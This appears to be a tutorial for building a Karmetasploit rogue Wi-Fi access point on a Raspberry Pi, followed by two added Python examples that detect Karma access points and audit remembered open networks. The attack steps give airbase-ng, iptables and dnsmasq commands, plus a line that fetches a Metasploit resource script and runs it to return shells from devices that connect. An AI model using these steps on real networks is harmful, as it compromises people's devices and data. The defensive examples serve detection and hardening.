For years, I’ve found that penetrating corporate environments through mobile devices is much easier than attacking border-edge firewalls and hardened servers. For this reason, I’ve begun using kits such as Karmetasploit. Leveraging a Raspberry Pi and Metasploit allows for instant shells and pillaging of data, using nothing more than a Raspberry Pi, an Alfa antenna and an internet connection.
Here is how you do it…
Install Raspbian on a Pi2 or greater. Once this has been done, apply all of the available updates.
sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get -y install vim
Next, install dnsmasq. This will be used for DNS resolution and DHCP address handouts.
sudo apt-get -y install dnsmasq
Once it is installed, edit its configuration file, /etc/dnsmasq.conf. The two settings that need changing are the listening interface and the DHCP lease range; the stock file introduces them with the following comments, and the directives are set directly beneath them:
# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
# Uncomment this to enable the integrated DHCP server, you need
# to supply the range of addresses available for lease and optionally
# a lease time. If you have more than one network, you will need to
# repeat this for each network on which you want to supply DHCP
Next, install Aircrack-ng by doing the following:
sudo apt-get -y install aircrack-ng
Once this is in place, you will need to create the proper rules to forward all “hooked” traffic. You can do this by issuing the following commands:
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Okay, time to start hooking devices…
Start airbase-ng so that it beacons a default SSID (“linksys”) but also answers every probe request it hears (-P), beaconing each probed name for 30 seconds (-C 30). wlan0mon is assumed to be the Alfa adapter already in monitor mode. Issue the following command; it will also create a new interface named at0:
airbase-ng -P -C 30 -e "linksys" -v wlan0mon
If done properly, airbase-ng reports that the access point has started (the screenshot from the original post is not reproduced here).
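The same two flags that make this access point useful to an attacker (answering every probe request, then beaconing each probed name) are what a defender can key on: one BSSID claiming many unrelated SSIDs within a short window. The detector below is an added example for this post, not code from the original or from the aircrack-ng project; the frame records it runs on are constructed, and the threshold and window are assumptions to tune for your environment.

```python
"""Flag Karma-style access points in a stream of 802.11 management frames.

Added example for this post (not from the original). The frames below are
constructed; a real feed would come from a wireless IDS or a monitor-mode
capture, with one record per beacon or probe response.

Heuristic: a genuine AP advertises one SSID per BSSID (enterprise gear
usually gives each SSID its own BSSID). An AP run as `airbase-ng -P -C 30`
answers every probe request and then beacons each probed name, so a single
BSSID is seen claiming many unrelated SSIDs within a few seconds.
"""
from collections import defaultdict

# (timestamp_s, subtype, bssid, ssid) -- constructed sample records
SAMPLE_FRAMES = [
    (0.0, "beacon", "00:11:22:33:44:55", "CorpWiFi"),
    (0.5, "beacon", "00:11:22:33:44:55", "CorpWiFi"),
    (1.0, "probe-resp", "66:77:88:99:aa:bb", "linksys"),
    (1.2, "probe-resp", "66:77:88:99:aa:bb", "Starbucks"),
    (1.4, "probe-resp", "66:77:88:99:aa:bb", "HomeNet"),
    (1.6, "beacon", "66:77:88:99:aa:bb", "Starbucks"),
    (1.8, "beacon", "66:77:88:99:aa:bb", "HomeNet"),
    (2.0, "probe-resp", "66:77:88:99:aa:bb", "attwifi"),
    (3.0, "beacon", "00:11:22:33:44:55", "CorpWiFi-Guest"),
]


def karma_suspects(frames, window_s=30.0, max_ssids=3):
    """Return {bssid: sorted distinct SSIDs} for every BSSID that advertised
    more than max_ssids distinct names inside any window_s-second span.

    window_s and max_ssids are assumed defaults: 30 s matches the -C value in
    this post, and three names tolerates an AP that legitimately carries a
    couple of SSIDs on one BSSID.
    """
    by_bssid = defaultdict(list)
    for ts, subtype, bssid, ssid in frames:
        # Only frames that assert an SSID on behalf of an AP are relevant;
        # probe *requests* come from clients and carry no AP claim.
        if subtype in ("beacon", "probe-resp") and ssid:
            by_bssid[bssid].append((ts, ssid))

    suspects = {}
    for bssid, obs in by_bssid.items():
        obs.sort()  # time order so the sliding window is well defined
        start = 0
        for end in range(len(obs)):
            while obs[end][0] - obs[start][0] > window_s:
                start += 1
            names = {s for _, s in obs[start:end + 1]}
            if len(names) > max_ssids:
                suspects[bssid] = sorted({s for _, s in obs})
                break
    return suspects


if __name__ == "__main__":
    for bssid, ssids in karma_suspects(SAMPLE_FRAMES).items():
        print(f"possible Karma AP {bssid}: claims {len(ssids)} SSIDs {ssids}")
```

The output that matters is the set of names one BSSID claimed, because that is also the list of SSIDs your client fleet is probing for; a remembered open network on that list is the profile to remove.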
Open a second terminal window, issue the following to configure the interface on at0:
ifconfig at0 up 10.10.10.1 netmask 255.255.255.0
service dnsmasq restart
Finally, begin autopwning devices by issuing the following command:
cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt
If done properly, msfconsole loads the resource script and starts the services it defines (the screenshot from the original post is not reproduced here).
You can confirm this by connecting a test device to any WiFi network it has previously joined and opening a browser. It should land on the page served by Karmetasploit rather than the site requested (screenshot in the original post, not reproduced here).
When successful, shells are returned in the second console window, the one running Karmetasploit.
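The test in the previous step only works because the device is willing to rejoin a network it has previously accepted without any authentication, so the client-side mitigation is to find and remove remembered open profiles. The audit below is an added example for this post, not code from the original; it assumes the client stores its profiles in wpa_supplicant.conf format (the `network={ ... }` blocks shown), and the sample configuration is constructed.

```python
"""Audit a wpa_supplicant.conf for remembered networks that would join an
unauthenticated access point.

Added example for this post (not from the original). SAMPLE_CONF is
constructed. A Karma-style AP can only get a client to associate if the
client has a remembered profile that accepts an open (or WEP) network with
that name, which in wpa_supplicant terms is `key_mgmt=NONE`. Profiles with
no key_mgmt line default to WPA-PSK/WPA-EAP and are not the exposure.
"""
import re

SAMPLE_CONF = """\
ctrl_interface=/run/wpa_supplicant
update_config=1

network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.test"
}
network={
    ssid="linksys"
    key_mgmt=NONE
}
network={
    ssid="HomeNet"
    psk="not-a-real-passphrase"
}
network={
    ssid="attwifi"
    key_mgmt=NONE
    disabled=1
}
"""

# One network={...} block per match; bodies never contain braces.
_BLOCK = re.compile(r"network=\{(.*?)\}", re.S)


def parse_networks(conf_text):
    """Return a list of dicts, one per network={...} block, with quotes
    stripped from values so ssid="x" and ssid=x compare equal."""
    nets = []
    for body in _BLOCK.findall(conf_text):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip().strip('"')
        nets.append(entry)
    return nets


def open_profiles(conf_text, include_disabled=False):
    """SSIDs of remembered profiles that accept an unauthenticated AP.

    Disabled profiles (disabled=1) are skipped by default because the
    supplicant will not auto-join them; pass include_disabled=True to list
    everything that should be cleaned out of the file.
    """
    found = []
    for net in parse_networks(conf_text):
        if net.get("key_mgmt", "").upper() != "NONE":
            continue
        if net.get("disabled") == "1" and not include_disabled:
            continue
        found.append(net.get("ssid", ""))
    return found


if __name__ == "__main__":
    for ssid in open_profiles(SAMPLE_CONF):
        print(f"remembered open network will auto-join a look-alike AP: {ssid!r}")
```

Run it against the client's real configuration file instead of SAMPLE_CONF to get the list of profiles to delete; a Karma AP's SSID list (the one the previous example recovers) intersected with this output is the concrete set of devices and names at risk.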